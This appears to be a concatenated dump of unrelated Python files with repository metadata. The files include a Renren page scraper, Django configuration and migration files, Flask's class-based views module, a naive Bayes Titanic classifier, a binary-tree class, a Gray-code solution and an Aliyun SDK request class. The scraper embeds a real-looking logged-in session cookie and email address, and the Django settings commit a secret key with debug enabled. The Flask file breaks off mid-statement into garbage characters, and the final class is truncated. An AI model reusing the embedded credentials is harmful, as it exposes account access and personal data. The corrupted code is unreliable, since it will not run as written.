        "Cookie": "anonymid=jpksloq576khwr; depovince=GW; _r01_=1; JXsgHEw; ick_login=9c4b2fwf53c-4585-4fwerew454554c-8a4537b-4868da280f90; _de=357231A48437FE1A247380B22A94C474696BF75400CE19CC; ick=73a512c4-e2a6-4cb4-8b38-ca91b727329c; __utma=15114tewtwf6938.1908916267.1544596057.1544596057.1544596057.1; __utmc=151wrewr146938; __utmz=151146938.1544596057.1.1.utmcsr=renren.com|utmccn=(referral)|utmcmd=wefwf|utmcct=/; __utmb=151146938.4.10.1544596057; jebecookies=74e6c1e6-9b9a-48ef-97a6-d243984caecc|||||; p=39f8205f846d7651e5637fewfwf5402bc0e4ef9; first_login_flag=1; ln_uact=655654191@qq.com; ln_hurl=http://hdn.xnimg.cn/photos/hdn121/20121209/2000/h_main_dkJa_7e500fwf00042161375.jpg; t=03ca85b59ewrrwr3420ba7f6fe9889; societyguester=03ca85b5fwf9db08585eb84a0ba7f6fe9889; id=335684059; xnsid=5ee445ea; loginfrom=syshome; ch_id=10016; jebe_key=f8ec8a51-b9c5-4c06-b1dc-2cf7de00f7cf%7C60eaa7a2aa1b3966a819f29c5fb94eae%7C1544596211030%7C1%7C1544596209079; wp_rewrwfold=0; ewrwe",
        "Host": "www.renren.com",
        "Referer": "http://friend.renren.com/managefriends",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3514.0 Safari/537.36"
    }
    for index, url in enumerate(url_list):
        request = urllib.request.Request(url, headers=headers)
        # BUG FIX: use a context manager so the HTTP response is always
        # closed (the original leaked the connection object).
        with urllib.request.urlopen(request) as response:
            with open(str(index)+".html", "wb") as f:
                f.write(response.read())


if __name__ == '__main__':
    send_request()
"670204191@qq.com"
] | 670204191@qq.com |
2f3f185e61fb9c48ca1ddc7abc2b366463a5e4e2 | eb233dfdb6819c038886f5c5b6f5b82538acd283 | /backendDjango/urls.py | ada8bcd16a0603d28b646880f22f9224223b1dfc | [] | no_license | mira87/adultingtasks-backend | 8c2b80940d5622b40a05b38ec5fd73aff5e6700f | 9c635dcacca0180f8ede1acc6a8612314c3a7189 | refs/heads/master | 2020-09-12T19:00:04.477318 | 2019-11-18T20:44:28 | 2019-11-18T20:44:28 | 222,519,040 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,029 | py | """backendDjango URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from rest_framework import routers
from adultingapp import views
# REST framework router: registers one API endpoint per viewset, with
# explicit basenames.
router=routers.DefaultRouter()
router.register(r'adultingtasks', views.AdultingTask,'adultingtask')
router.register(r'categories', views.Category,'categories')

# Root URL map: Django admin plus the routed API under /api/.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('api/', include(router.urls))
]
| [
"shamirajones@shamiras-mbp.home"
] | shamirajones@shamiras-mbp.home |
902df8b01bd58a51daaf42646c78c4e62c3a51c4 | a4ea1019fa143bf1578f9176796052736d436fdb | /venv/Lib/site-packages/flask/views.py | 24cb5e2ba4b9061d2639e255b8635f2d4d8cd728 | [] | no_license | KeiKooLoc/Denend.github.io | 16f60fc4d2ecb9bdc8b685f2fcea4fdacca4f13d | 15f900ad0a0a6ea68a64ff7f9762c61cf60595af | refs/heads/master | 2020-03-29T13:41:57.236863 | 2019-04-22T20:49:04 | 2019-04-22T20:49:04 | 149,977,191 | 0 | 0 | null | 2018-09-23T11:16:24 | 2018-09-23T11:16:24 | null | MacCentralEurope | Python | false | false | 5,836 | py | # -*- coding: utf-8 -*-
"""
flask.views
~~~~~~~~~~~
This module provides class-based views inspired by the ones in Django.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from .globals import request
from ._compat import with_metaclass
# Lower-cased HTTP verb names; MethodViewType looks for handler methods
# with exactly these names on a view class.
http_method_funcs = frozenset(['get', 'post', 'head', 'options',
                               'delete', 'put', 'trace', 'patch'])
class View(object):
    """Alternative way to use view functions.  A subclass has to implement
    :meth:`dispatch_request` which is called with the view arguments from
    the URL routing system.  If :attr:`methods` is provided the methods
    do not have to be passed to the :meth:`~flask.Flask.add_url_rule`
    method explicitly::

        class MyView(View):
            methods = ['GET']

            def dispatch_request(self, name):
                return 'Hello %s!' % name

        app.add_url_rule('/hello/<name>', view_func=MyView.as_view('myview'))

    When you want to decorate a pluggable view you will have to either do that
    when the view function is created (by wrapping the return value of
    :meth:`as_view`) or you can use the :attr:`decorators` attribute::

        class SecretView(View):
            methods = ['GET']
            decorators = [superuser_required]

            def dispatch_request(self):
                ...

    The decorators stored in the decorators list are applied one after another
    when the view function is created.  Note that you can *not* use the class
    based decorators since those would decorate the view class and not the
    generated view function!
    """

    #: A list of methods this view can handle.
    methods = None

    #: Setting this disables or force-enables the automatic options handling.
    provide_automatic_options = None

    #: The canonical way to decorate class-based views is to decorate the
    #: return value of as_view().  However since this moves parts of the
    #: logic from the class declaration to the place where it's hooked
    #: into the routing system.
    #:
    #: You can place one or more decorators in this list and whenever the
    #: view function is created the result is automatically decorated.
    #:
    #: .. versionadded:: 0.8
    decorators = ()

    def dispatch_request(self):
        """Subclasses have to override this method to implement the
        actual view function code.  This method is called with all
        the arguments from the URL rule.
        """
        raise NotImplementedError()

    @classmethod
    def as_view(cls, name, *class_args, **class_kwargs):
        """Converts the class into an actual view function that can be used
        with the routing system.  Internally this generates a function on the
        fly which will instantiate the :class:`View` on each request and call
        the :meth:`dispatch_request` method on it.

        The arguments passed to :meth:`as_view` are forwarded to the
        constructor of the class.
        """
        def view(*args, **kwargs):
            # A fresh instance per request, so per-request state lives on
            # the instance and cannot leak between requests.
            self = view.view_class(*class_args, **class_kwargs)
            return self.dispatch_request(*args, **kwargs)

        if cls.decorators:
            # Set name/module *before* decorating so decorators that
            # inspect the wrapped function see the intended values.
            view.__name__ = name
            view.__module__ = cls.__module__
            for decorator in cls.decorators:
                view = decorator(view)

        # We attach the view class to the view function for two reasons:
        # first of all it allows us to easily figure out what class-based
        # view this thing came from, secondly it's also used for instantiating
        # the view class so you can actually replace it with something else
        # for testing purposes and debugging.
        view.view_class = cls
        view.__name__ = name
        view.__doc__ = cls.__doc__
        view.__module__ = cls.__module__
        view.methods = cls.methods
        view.provide_automatic_options = cls.provide_automatic_options
        return view
class MethodViewType(type):
    """Metaclass for :class:`MethodView` that collects which HTTP methods
    the view class implements.
    """

    def __init__(cls, name, bases, d):
        super(MethodViewType, cls).__init__(name, bases, d)

        # An explicit ``methods`` attribute in the class body wins outright.
        if 'methods' not in d:
            handlers = {
                verb.upper() for verb in http_method_funcs if hasattr(cls, verb)
            }
            # Only assign when at least one handler exists: the base class
            # (and subclasses that add no new handler methods) must inherit
            # ``methods`` unchanged instead of clobbering it.
            if handlers:
                cls.methods = handlers
class MethodView(with_metaclass(MethodViewType, View)):
"""A class-based view that dispatches request methods to the corresponding
class methods. For example, if you implement a ``get`` method, it will be
used to handle ``GET`` requests. ::
class CounterAPI(MethodView):
def get(self):
return session.get('counter', 0)
def post(self):
session['counter'] = session.get('counter', 0) + 1
return 'OK'
app.add_url_rule('/counter', view_func=CounterAPI.as_view('counter'))
"""
def dispatch_request(self, *args, **kwargs):
meth = getattr(self, request.method.lower(), None)
# If the request method is HEAD and we don't have a handler for it
# retry with GET.
if meth is None and request.method == 'HEAD':
meth = getattr(self, 'get', None)
asseˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇ | [
"denend@users.noreply.github.com"
] | denend@users.noreply.github.com |
c1a3bb0799df7204d756f505eb6a62faf5ca08e0 | 9dfda55d16ee16df8762a9987e154244d8ff948d | /web/migrations/0006_auto_20160512_1957.py | 9927bacc7dc31a6c359b9546fa87c33f9dbb39e5 | [] | no_license | damikdk/Excel-Django-Angular | 78b191ca56536167f3d4dbd2ac3fc03d87586d5c | c29d9dda0fa6604c54f8a2df684f9e4d07f6b549 | refs/heads/master | 2021-01-17T10:31:06.235997 | 2016-07-12T12:26:19 | 2016-07-12T12:26:19 | 58,670,651 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 530 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-12 19:57
from __future__ import unicode_literals
from django.db import migrations, models
import web.validators
class Migration(migrations.Migration):
    """Auto-generated schema migration: re-declares ``OfficeFile.file`` so
    uploads are checked by ``web.validators.validate_file_extension``."""

    dependencies = [
        ('web', '0005_remove_officefile_max_coor'),
    ]

    operations = [
        migrations.AlterField(
            model_name='officefile',
            name='file',
            field=models.FileField(upload_to='', validators=[web.validators.validate_file_extension]),
        ),
    ]
| [
"damikdk@gmail.com"
] | damikdk@gmail.com |
35fe9e8d12cff46a0e0ea7b51843e2426507bb4a | 59e87634c67508bf7eba8c8b9845354aefa57bc7 | /ML/naiveBayes/bayes-titanic.py | b9caec4be2a8acf3fb164902e7017e85f90efa1c | [] | no_license | Caohengrui/MLAndDL | 48729b94b2232e628b699cf8d0d4a6c6e81a36f5 | d0637f58f45e9c091cd90bbfe9c207223d0994f3 | refs/heads/master | 2023-03-16T01:06:03.316463 | 2020-04-14T07:44:15 | 2020-04-14T07:44:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,446 | py | """
Author:wucng
Time: 20200110
Summary: 朴素贝叶斯对titanic数据分类
源代码: https://github.com/wucng/MLAndDL
参考:https://cuijiahua.com/blog/2017/11/ml_4_bayes_1.html
"""
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler,MinMaxScaler
# from sklearn.neighbors import KNeighborsRegressor,KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score,auc
import pandas as pd
import numpy as np
from functools import reduce
from collections import Counter
import pickle,os,time
# 1.加载数据集(并做预处理)
# 1.加载数据集(并做预处理)
def loadData(dataPath: str) -> tuple:
    """Load the Titanic CSV, impute and integer-encode the raw columns and
    return ``(features, labels)`` as numpy arrays, with every feature column
    min-max scaled into [0, 1]."""
    frame = pd.read_csv(dataPath, sep=",")
    # Impute missing values: median age, most frequent port for Embarked.
    frame["Age"] = frame["Age"].fillna(frame["Age"].median())
    frame['Embarked'] = frame['Embarked'].fillna('S')
    # Encode the categorical text columns as integers.
    frame.replace("male", 0, inplace=True)
    frame.replace("female", 1, inplace=True)
    for code, port in enumerate(("S", "C", "Q")):
        frame.loc[frame["Embarked"] == port, "Embarked"] = code
    # Split the feature columns from the label column.
    dropped = ["PassengerId", "Survived", "Name", "Ticket", "Cabin"]
    features = frame.drop(dropped, axis=1)
    labels = frame.Survived
    # Min-max scale each feature column.
    col_min = np.min(features, axis=0)
    col_max = np.max(features, axis=0)
    features = (features - col_min) / (col_max - col_min)
    return (features.to_numpy(), labels.to_numpy())
class NaiveBayesClassifier(object):
    """Naive Bayes over discrete feature values.

    ``fit`` estimates the class priors P(y), the marginal value frequencies
    P(x_col = v) and the class-conditional frequencies P(x_col = v | y),
    and pickles the three tables to ``save_file``; prediction reloads them
    from disk, so a fitted model survives process restarts.
    """
    def __init__(self,save_file="model.ckpt"):
        # Path the pickled probability tables are written to / read from.
        self.save_file = save_file
    def fit(self,X:np.array,y:np.array):
        """Estimate all probability tables from (X, y) and persist them.

        BUG FIX: the original silently skipped training whenever
        ``save_file`` already existed, so refitting with new data had no
        effect; the tables are now always rebuilt and overwritten.
        """
        # Class priors P(y).
        dict_y = dict(Counter(y))
        dict_y = {k:v/len(y) for k,v in dict_y.items()}
        # Marginal frequency of every observed value in every feature column,
        # keyed "<col>_<value>".
        unique_label = list(set(y))
        dict_feature_value={}
        for col in range(len(X[0])):
            data = X[...,col]
            unique_val = list(set(data))
            for val in unique_val:
                dict_feature_value[str(col)+"_"+str(val)] = np.sum(data==val)/len(data)
        # Class-conditional frequencies, keyed "<label>_<col>_<value>".
        dict_feature_value_label = {}
        for label in unique_label:
            datas = X[y==label]
            for col in range(len(datas[0])):
                data = datas[..., col]
                unique_val = list(set(data))
                for val in unique_val:
                    dict_feature_value_label[str(label)+"_"+str(col)+"_"+str(val)] = np.sum(data==val)/len(data)
        result = {"dict_y":dict_y,"dict_feature_value":dict_feature_value,
                  "dict_feature_value_label":dict_feature_value_label}
        # BUG FIX: context manager so the file handle is always closed.
        with open(self.save_file,"wb") as fp:
            pickle.dump(result,fp)
    def __load_model(self):
        # Read the pickled probability tables back from disk.
        with open(self.save_file,"rb") as fp:
            return pickle.load(fp)
    def __predict(self,X:np.array):
        """Return the unnormalised posterior scores for every row of X,
        one column per class (classes in sorted label order)."""
        data = self.__load_model()
        dict_y = data["dict_y"]
        dict_feature_value = data["dict_feature_value"]
        dict_feature_value_label = data["dict_feature_value_label"]
        labels = sorted(list(dict_y.keys()))
        preds = np.zeros([len(X),len(labels)])
        for i,x in enumerate(X):
            for j,label in enumerate(labels):
                p1 = 1  # product of P(x_col = v | y = label)
                p2 = 1  # product of P(x_col = v)
                for col,val in enumerate(x):
                    # Unseen (label, col, value) combinations fall back to an
                    # interpolated estimate or a small constant.
                    key_l = str(label)+"_"+str(col)+"_"+str(val)
                    key_m = str(col)+"_"+str(val)
                    p1 *= dict_feature_value_label[key_l] if key_l in dict_feature_value_label \
                        else self.__weighted_average(key_l, dict_feature_value_label)
                    p2 *= dict_feature_value[key_m] if key_m in dict_feature_value \
                        else self.__weighted_average(key_m, dict_feature_value)
                # Bayes rule with constant factors dropped.
                preds[i,j] = p1*dict_y[label]/p2
        return preds
    def __fixed_value(self):
        # Fallback probability for values with no usable neighbours.
        return 1e-3
    def __weighted_average(self,key:str,data_dict:dict):
        """Estimate the probability of an unseen value by interpolating
        between the nearest observed values with the same column (and
        label) prefix."""
        tmp = key.split("_")
        value = float(tmp[-1])
        if len(tmp)==3:
            tmp_key = tmp[0]+"_"+tmp[1]+"_"
        else:
            tmp_key = tmp[0] + "_"
        # Collect observed values sharing this prefix.
        values = [value]
        for k in list(data_dict.keys()):
            if tmp_key in k:
                values.append(float(k.split("_")[-1]))
        values = sorted(values)
        index = values.index(value)
        # Interpolate between the previous and next observed value.
        last = max(0,index-1)
        next = min(index+1,len(values)-1)
        if index==last or index==next:
            return self.__fixed_value()
        else:
            d1 = abs(values[last] - value)
            d2 = abs(values[next] - value)
            v1 = data_dict[tmp_key+str(values[last])]
            v2 = data_dict[tmp_key+str(values[next])]
            # NOTE(review): log-distance weighting; for distances < 1 the
            # weights are negative — kept exactly as in the original formula.
            return (np.log(d1)*v1+np.log(d2)*v2)/(np.log(d1)+np.log(d2))
    def predict_proba(self,X:np.array):
        """Unnormalised class scores, one column per class (sorted labels)."""
        return self.__predict(X)
    def predict(self,X:np.array):
        """Predicted class label for every row of X.

        BUG FIX: the original returned ``argmax`` column indices, which
        only equal the labels when the classes happen to be 0..K-1; the
        indices are now mapped back to the actual label values.
        """
        labels = np.array(sorted(self.__load_model()["dict_y"].keys()))
        return labels[np.argmax(self.__predict(X),-1)]
    def accuracy(self,y_true:np.array,y_pred:np.array)->float:
        """Fraction of correct predictions, rounded to 5 decimals."""
        return round(np.sum(y_pred==y_true)/len(y_pred),5)
if __name__=="__main__":
    # Benchmark this NaiveBayesClassifier against three sklearn baselines on
    # the Titanic training data (path spelling kept as in the original repo).
    dataPath = "../../dataset/titannic/train.csv"
    X, y = loadData(dataPath)
    # Split into training and test sets (fixed seed for reproducibility).
    X_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.2, random_state=40)
    start = time.time()
    clf = NaiveBayesClassifier()
    clf.fit(X_train,y_train)
    y_pred = clf.predict(X_test)
    print("cost time:%.6f(s) acc:%.3f"%(time.time()-start,clf.accuracy(y_test,y_pred)))
    # cost time:0.089734(s) acc:0.771
    # Baseline: sklearn GaussianNB
    start = time.time()
    clf = GaussianNB()
    clf.fit(X_train,y_train)
    y_pred = clf.predict(X_test)
    print("cost time:%.6f(s) acc:%.3f" % (time.time() - start, accuracy_score(y_test, y_pred)))
    # cost time:0.001023(s) acc:0.810
    # Baseline: sklearn DecisionTreeClassifier
    start = time.time()
    clf = DecisionTreeClassifier()
    clf.fit(X_train, y_train)
    y_pred = clf.predict(X_test)
    print("cost time:%.6f(s) acc:%.3f" % (time.time() - start, accuracy_score(y_test, y_pred)))
    # cost time:0.008215(s) acc:0.816
    # Baseline: sklearn RandomForestClassifier
    start = time.time()
    clf = RandomForestClassifier()
    clf.fit(X_train, y_train)
    y_pred = clf.predict(X_test)
    print("cost time:%.6f(s) acc:%.3f" % (time.time() - start, accuracy_score(y_test, y_pred)))
# cost time:0.018951(s) acc:0.782 | [
"gzcl_wcon@126.com"
] | gzcl_wcon@126.com |
38a90854558605e5a014f7e6272b4f3c11060c65 | 265a07a2becd232b292872d1d7136789463874be | /lianxi代码/erchashu.py | 5543da1004e52bdcd18148677402156b24dcc306 | [] | no_license | Lz0224/Python-exercise | f4918b8cd5f7911f0c35c0458c2269959937d07d | 3d09f54aebc653f4a5b36765b25c7241e3960764 | refs/heads/master | 2020-12-24T22:20:55.573019 | 2017-08-11T07:18:16 | 2017-08-11T07:18:16 | 100,005,776 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,647 | py | #!/usr/bin/python
#coding=utf-8
'''
created bu zwg in 2017-7-8
'''
import copy
class node(object):
    """A binary-tree node: a name, a payload, and links to parent/children.

    ``child_number`` counts attached children; it is only incremented on the
    first attachment to an empty slot (replacing an existing child merely
    overwrites the reference, mirroring the original behaviour).
    """

    def __init__(self, name, data):
        self.name = name
        self.data = data
        self.Lchild = None
        self.Rchild = None
        self.parent = None
        self.child_number = 0

    def add_Rchild(self, child):
        # First attachment bumps the counter and back-links the parent;
        # replacing an occupied right slot only swaps the reference.
        if self.Rchild is None:
            self.Rchild = child
            self.child_number += 1
            child.set_parent(self)
        else:
            self.Rchild = child

    def drop_Rchild(self):
        self.Rchild = None
        self.child_number -= 1

    def set_parent(self, parent):
        self.parent = parent

    def add_Lchild(self, child):
        if self.Lchild is None:
            self.Lchild = child
            self.child_number += 1
            child.set_parent(self)
        else:
            self.Lchild = child

    def drop_Lchild(self):
        self.Lchild = None
        self.child_number -= 1
class tree(object):
    """Binary-tree wrapper built from a root node.

    Records the root, the tree depth (number of levels), the visited nodes by
    name (``all_node``) and the nodes that can still accept a child
    (``enable_node``).  As in the original, only the root is entered into the
    two dictionaries; deeper bookkeeping appears to have been truncated from
    the source file.
    """

    def __init__(self, node):
        self.parent = node
        self.depth = 1
        # BUG FIX: stray garbled comment text had been fused into this
        # assignment in the original, making the line a syntax error.
        self.all_node = {node.name: node}
        self.enable_node = {node.name: node}
        c1 = node.Rchild
        c2 = node.Lchild
        C = [c1, c2]
        B = [i for i in C if i is not None]
        if len(B) == 2:
            # The root already has both children, so it cannot take more.
            del self.enable_node[node.name]
        # Breadth-first walk: one loop iteration per tree level.
        while len(B) != 0:
            self.depth += 1
            C = []
            for i in B:
                if i.Rchild is not None:
                    C.append(i.Rchild)
                if i.Lchild is not None:
                    C.append(i.Lchild)
            # BUG FIX: the original never advanced the frontier (B was left
            # unchanged), looping forever whenever the root had any child.
            # The file looks truncated here, so this reconstruction should be
            # confirmed against the intended behaviour.
            B = C
| [
"Lz0o_o0@outlook.com"
] | Lz0o_o0@outlook.com |
eeaee40200b52c8964177e6365c6f24ec9f71958 | 9d3afabc34566173b16ebc9c352b14a1b7d85ad9 | /FamBudget/settings.py | e0596f9b15b5ab400c88d6f8cf1ba30804fd550f | [] | no_license | Romantano/Family-Budget | ec7625b2d6c8613610b9c1d6c680a5ff38fa5045 | 212337cb13322892cf5e104fd4af848eff8b1d73 | refs/heads/master | 2020-03-22T00:30:26.586466 | 2018-07-08T20:21:44 | 2018-07-08T20:21:44 | 139,249,040 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,143 | py | """
Django settings for FamBudget project.
Generated by 'django-admin startproject' using Django 1.11.13.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control; rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = '^47mt_9we07cagjd2@p2tfvx2nhn#%(#^vh+rm8dorp(_g+#vv'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty is acceptable while DEBUG is True; real host names are required in
# production.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'Planning',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'FamBudget.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # NOTE(review): this registers BASE_DIR itself and the *relative*
        # string 'templates' as two separate template dirs; the intent was
        # probably os.path.join(BASE_DIR, 'templates') -- confirm.
        'DIRS': [BASE_DIR, 'templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'FamBudget.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
# Development database: file-based SQLite next to the project.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"antonsvz@gmail.com"
] | antonsvz@gmail.com |
b8e02a80dd4ae30959b434085ed27933a2f54964 | ae3d0e3c2fb614d96f6c787583c6e2e4cb654ad4 | /leetcode/89. 格雷编码.py | 6efb740a93fba7e0c11adf3290a8e415330f35cf | [] | no_license | Cjz-Y/shuati | 877c3f162ff75f764aa514076caccad1b6b43638 | 9ab35dbffed7865e41b437b026f2268d133357be | refs/heads/master | 2023-02-02T10:34:05.705945 | 2020-12-14T01:41:39 | 2020-12-14T01:41:39 | 276,884,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | from typing import List
class Solution:
    def grayCode(self, n: int) -> List[int]:
        """Return an n-bit Gray code sequence starting at 0 (LeetCode 89).

        Replaces the original greedy search -- which flipped one bit at a
        time on a '0'/'1' string and kept a set of visited strings, roughly
        O(2**n * n**2) with heavy string churn -- by the closed form of the
        binary-reflected Gray code, G(i) = i XOR (i >> 1), which emits the
        canonical sequence directly in O(2**n).

        Consecutive entries (and the last/first pair) differ in exactly one
        bit; for n == 0 the result is [0], so no special case is needed.
        Any valid Gray ordering is accepted by the problem; this returns the
        canonical one.
        """
        return [i ^ (i >> 1) for i in range(1 << n)]
| [
"cjz.y@hotmail.com"
] | cjz.y@hotmail.com |
825f83d74c3367408205ccb1cc9c5bf61fb0b590 | 85c52a7c8cc21060e1511da1df02162e5fc78378 | /tests/test_models.py | 5ae3bb97d0b73a3979fb5b85dcb4b3b7f6e40b14 | [] | no_license | ramonabmello/desafio_starwars | d3720f236c316bda9d916b454f3314f36dd3a336 | 23ba32ba5af95c8360e7c929253f6d33bfc8c1dc | refs/heads/master | 2020-03-31T23:33:02.484009 | 2018-10-30T15:42:41 | 2018-10-30T15:42:41 | 152,659,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,026 | py | import unittest
from game_star_wars import models
class TestPlanet(unittest.TestCase):
    """Unit tests for models.Planet.

    Uses unittest assertion methods instead of bare ``assert`` statements:
    bare asserts are stripped when Python runs with ``-O`` and produce no
    value diff on failure, while assertEqual reports both sides.
    """
    def test_has_id(self):
        planet = models.Planet(id=1)
        self.assertEqual(planet.id, 1)
    def test_has_name(self):
        planet = models.Planet(name='Tatooine')
        self.assertEqual(planet.name, 'Tatooine')
    def test_has_climate(self):
        planet = models.Planet(climate='arid')
        self.assertEqual(planet.climate, 'arid')
    def test_has_terrain(self):
        planet = models.Planet(terrain='desert')
        self.assertEqual(planet.terrain, 'desert')
    def test_representation(self):
        planet = models.Planet(
            id=1,
            name='Tatooine',
            climate='arid',
            terrain='desert'
        )
        expected = 'Planet: Tatooine\nClimate: arid\nTerrain: desert'
        self.assertEqual(repr(planet), expected)
    def test_number_of_movie_appearances(self):
        # NOTE(review): the expected count of 5 presumably comes from the
        # film data behind models.Planet -- confirm against that source.
        planet = models.Planet(name='Tatooine')
        self.assertEqual(planet.number_of_movie_appearances, 5)
| [
"contato@ramonamello.com.br"
] | contato@ramonamello.com.br |
0b573c7d0218cd57688f0d50721997333fe6315d | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-cbn/aliyunsdkcbn/request/v20170912/CreateTransitRouteTableAggregationRequest.py | 33fc8ff3c8ce5418023c4de179e733b508294cf5 | [
"Apache-2.0"
] | permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 4,095 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkcbn.endpoint import endpoint_data
class CreateTransitRouteTableAggregationRequest(RpcRequest):
    """RPC request for the CBN ``CreateTransitRouteTableAggregation`` API
    (version 2017-09-12), which creates an aggregation route (CIDR) on a
    transit router route table.

    SDK-style boilerplate: one getter/setter pair per query parameter, each
    setter writing straight into the request's query-parameter map.
    """
    def __init__(self):
        RpcRequest.__init__(self, 'Cbn', '2017-09-12', 'CreateTransitRouteTableAggregation')
        self.set_method('POST')
        if hasattr(self, "endpoint_map"):
            setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
        if hasattr(self, "endpoint_regional"):
            setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
    def get_ResourceOwnerId(self): # Long
        return self.get_query_params().get('ResourceOwnerId')
    def set_ResourceOwnerId(self, ResourceOwnerId): # Long
        self.add_query_param('ResourceOwnerId', ResourceOwnerId)
    def get_ClientToken(self): # String
        return self.get_query_params().get('ClientToken')
    def set_ClientToken(self, ClientToken): # String
        self.add_query_param('ClientToken', ClientToken)
    def get_TransitRouteTableAggregationDescription(self): # String
        return self.get_query_params().get('TransitRouteTableAggregationDescription')
    def set_TransitRouteTableAggregationDescription(self, TransitRouteTableAggregationDescription): # String
        self.add_query_param('TransitRouteTableAggregationDescription', TransitRouteTableAggregationDescription)
    def get_TransitRouteTableAggregationName(self): # String
        return self.get_query_params().get('TransitRouteTableAggregationName')
    def set_TransitRouteTableAggregationName(self, TransitRouteTableAggregationName): # String
        self.add_query_param('TransitRouteTableAggregationName', TransitRouteTableAggregationName)
    def get_DryRun(self): # Boolean
        return self.get_query_params().get('DryRun')
    def set_DryRun(self, DryRun): # Boolean
        self.add_query_param('DryRun', DryRun)
    def get_ResourceOwnerAccount(self): # String
